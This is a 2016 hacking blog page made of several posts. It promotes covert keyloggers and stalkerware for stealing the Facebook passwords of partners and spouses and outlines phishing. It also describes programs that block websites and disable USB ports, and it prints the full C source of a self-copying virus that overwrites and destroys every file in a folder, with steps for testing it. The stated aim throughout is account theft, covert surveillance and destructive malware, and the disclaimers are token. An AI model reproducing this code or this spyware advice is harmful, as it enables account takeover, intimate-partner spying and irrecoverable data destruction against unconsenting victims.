Saturday, 9 April 2016

How to Hack WhatsApp Account

Need to Hack WhatsApp Account?
Below is a WhatsApp Hack Guide with Complete Instructions!

Learn how to hack WhatsApp in simple steps with the following easy to follow and foolproof tutorial.

How to Hack WhatsApp Account

Read More

How to Spoof MAC Address on Android Phones

Media Access Control address (MAC address) is a 12-character unique identifier assigned to a specific piece of hardware such as the network adapter of your WiFi device.

How to Spoof MAC Address on Android Phones

Read More

How to Hack successfully Gmail Password.

With Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages.

How to Hack successfully Gmail Password.

Read More

How to Hack Facebook Password

Need to Hack Someone’s Facebook Password?
Here’s a Complete Guide on Possible Ways to Hack Facebook!
In the recent years, Facebook has also become a popular place for many to exchange secret messages and manage illicit relationships. Therefore, it’s no wonder many people make up their minds to hack Facebook password of their loved ones. May be you’re in a similar situation or just want to hack the password of any Facebook account, this article will surely help you out.

Recently, a lot of fake websites have popped-up on the Internet making false promises to hack the Facebook password of any account. These sites often demand people to take-up a surveys in order to reveal the password of the hacked Facebook account. This is only a trick to make quick money by forcing people to take up surveys. However, upon completing of the survey no Facebook password is given to the people. So, I always warn my visitors about such scam websites and their fake promises about hacking Facebook.


Possible Ways to Hack a Facebook Password:

With over 2 years of experience, I can tell you is that there are only TWO ways to hack a Facebook password.:

1. Using a Keylogger – Easiest Way to Hack Facebook!


A keylogger when installed will simply record each and every keystroke that a user types on a specific computer’s keyboard including Facebook or any other account password.
Since keylogger requires no special skills to install and use, it is the easiest way to hack a Facebook password. I recommend the following keylogger program asthe best one to gain access to Facebook or any other online account:
To Hack Facebook Users on PC/Mac:
How to Hack Facebook Password


Why Realtime-Spy is the Best?
Realtime-Spy Top Features:
  • Remote Installation from any corner of the globe.
  • 100% stealth operation and remains undetected!
  • Extremely easy to use as it requires no special skills to install.
  • Compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.

How it Works?

To hack the Facebook password, all you need to do is just install Realtime-Spy on the target computer. When the target user logs into his Facebook account from this computer, the login details (username and password) are captured and uploaded instantly to the Realtime-Spy servers. You can later access the stored logs to obtain the Facebook password.

Download Realtime-Spy – for Windows
Download Realtime-Spy – for Mac

To Hack Facebook Users on Mobile:
To hack the Facebook password of mobile users, there is a mobile version of this program called “mSpy”.
Download mSpy – for Mobile Devices
Supported Phones: Android, iPhone, iPad and Tablets.

2. Phishing – The Difficult Way:

The other common way to hack Facebook account is via Phishing. This method will make use of a fake login page (spoofed web page) which will exactly resemble the original one. A spoofed web page of Facebook looks exactly same as that of the original Facebook website. This page is actually created by the hacker and is hosted on his own server. Once the victim enters his/her Facebook password on such a fake login page, the login details are stolen away by the hacker.
Phishing requires specialized knowledge and high level skills to implement. Therefore, it would not be possible for a newbie user (perhaps like you) to attempt this trick. It is a punishable offense too. So in order to successfully hack the Facebook password, I recommend the usage of keylogger as it is the easiest and the safest way.

Why do People Want to Hack Facebook Passwords?

You many wonder why people want to hack the password of someone’s Facebook account. In most cases people attempt to hack the Facebook account of their boyfriend or girlfriend so as to find out what is going on behind the scenes. These days parents are also concerned about their child’s Facebook activity and would like to hack their Facebook accounts to monitor. A husband or wife may try to hack the password and gain access to a suspicious partner’s Facebook account and so on. While most people have a strong motive behind their need to hack passwords, there are a few who also hack Facebook password just to exhibit their skills.

Facebook Hacking Methods that Do Not Work:

  1. There is no ready-made software program that is available to hack Facebook password (except the keylogger). In fact, keyloggers are pretty generic and are designed to log the keystrokes of a specific computer which in turn can be used to hack Facebook passwords.
  2. It is no longer possible to use conventional methods like brute-force approach to hack Facebook password. This is because big time players like Facebook have employed tight security measures to protect themselves against any such password hacking attempts. Since Facebook has millions of users, they take every possible security measure to safeguard their accounts which otherwise could cause a severe impact on their business. So, if you come across any website teaching such age old tricks, please be assured that they cannot be successful against Facebook.

Common Myths About Hacking Facebook Password

Unlike what many scam websites claim, Facebook website or Facebook servers do not contain any flaw that allows hackers to crack its password. The only Facebook hacking method that can give you the password is keylogging and phishing. None of the other methods is known to obtain the password for you!
DISCLAIMER: YOU IMPLEMENT ALL THE INFORMATION PROVIDED IN THIS ARTICLE AT YOUR OWN RISK. USAGE OF SPYWARE WITHOUT PRIOR USER CONSENT MAY BE AGAINST YOUR LOCAL LAWS AND YOU DO IT AT YOUR OWN RISK!
THE END

How to Hack Facebook Password

Read More

Friday, 8 April 2016

How to Create a Virus to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube websites. If you are curious about creating such a virus on your own, here is how it can be done.
As usual I am using my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of ‘C’ will be able to understand the working of this virus program. When this program is executed, it will block all those websites that are listed in the source code. In the following example, the sites that are listed in the source code are Google, Yahoo and Youtube. When you download the source code of this program, you have a choice to include your own list of sites that you want this virus to block.
I have just removed the source code of this program from this post as it is lengthy and makes the post look messy. You can still download the source code of this virus program from the following link:

How Virus Program Works?

The Windows operating system maintains a special file called HOSTS which can be used to block any given hostname or domain name (website) by adding new entries onto it. This program works by modifying the HOSTS file by adding new entries of those sites that are intended to be blocked. The HOSTS file is located at:
%windir%\system32\drivers\etc (Usually: C:\windows\system32\drivers\etc)

So, when you execute this program, all it does is add the entries of the list of those sites (mentioned in the source code) to this HOSTS file. Once this is done, the site will be blocked from your computer. So, none of the browsers would be able to load those sites on your computer.

Now, as far as the technical part of this program is concerned, people who have a working knowledge of ‘C’ should be easily able to understand the working of this virus program. However, for those who are new to ‘C’ programming, here is the algorithm of this program:
  • Determine the Root drive. ie: Find the drive (C:, D:, E: or F:) on which the Windows is installed.
  • Navigate to: %windir% -> system32 -> drivers -> etc
  • Open/Load the HOSTS file.
  • Copy a list of those websites that are mentioned in the ARRAY to the END of the file.
  • Save the file and Exit.

How to Compile the Source Code?

For a step-by-step compilation guide, refer my post: How to compile C Programs?

Testing the Virus:

  1. To test, run the compiled module. It will block the sites that are listed in the source code.
  2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
  3. To remove the virus type the following command in the Run.
    %windir%\system32\drivers\etc
  4. There, open the file named “hosts” using the notepad. At the bottom of the opened file you’ll see something like this:
    127.0.0.1 google.com
  5. Delete all such entries which contain the names of blocked sites.
THE END

How to Create a Virus to Block Websites

Read More

Wednesday, 6 April 2016

A Virus Program to Disable USB Ports



In this post, I will show how to create a simple virus that disables the USB portson the computer (PC). As usual, I am using my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result you’ll will not be able to use your pen drive or any other USB peripheral devices on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
Download the source code of the virus program on to your computer from the following link:

  1. The download contains the following 2 files:
    • block_usb.c (source code)
    • unblock_usb.c (source code)
  2. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my page – How to Compile C Programs.
    3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
  3. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

      How it Works?
    The idea behind the working of this virus is pretty straightforward. It works by gaining access to the Windows registry and modifying its settings to disable the USB device support on the computer.
    On the other hand, the other program will re-set the registry settings back to the normal so that the support for USB devices is re-enabled. I hope you like this post. Please pass your comments.
    THE END

A Virus Program to Disable USB Ports

Read More

How to Create a Computer Virus?How to Create a Computer Virus?

This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.
Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.
Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],"rb"); 
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL) goto next;
x=89088;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n",
(end-st)/CLK_TCK);
getch();
}

This virus is designed to infect all types of files with any extension.


You can download the source code from the following link:

How the Virus Program Works?

The algorithm of this virus program is as follows:
Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).
Step-2: Load the copy of the virus itself onto the memory.
Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.
Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.
As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.

How to Compile the Program:

For a step-by-step guide, you can refer my detailed page on- how to compile C programs?

How to Test the Virus After the Compilation:

  1. Create a new empty folder.
  2. Put some executable files (or any other files) in the folder.
  3. Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.
  4. Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.
NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.
THE END

How to Create a Computer Virus?

Read More

Print OR PDF

Copyright © 2014 HACK WITH VIRUS | Designed With By Blogger Templates
Scroll To Top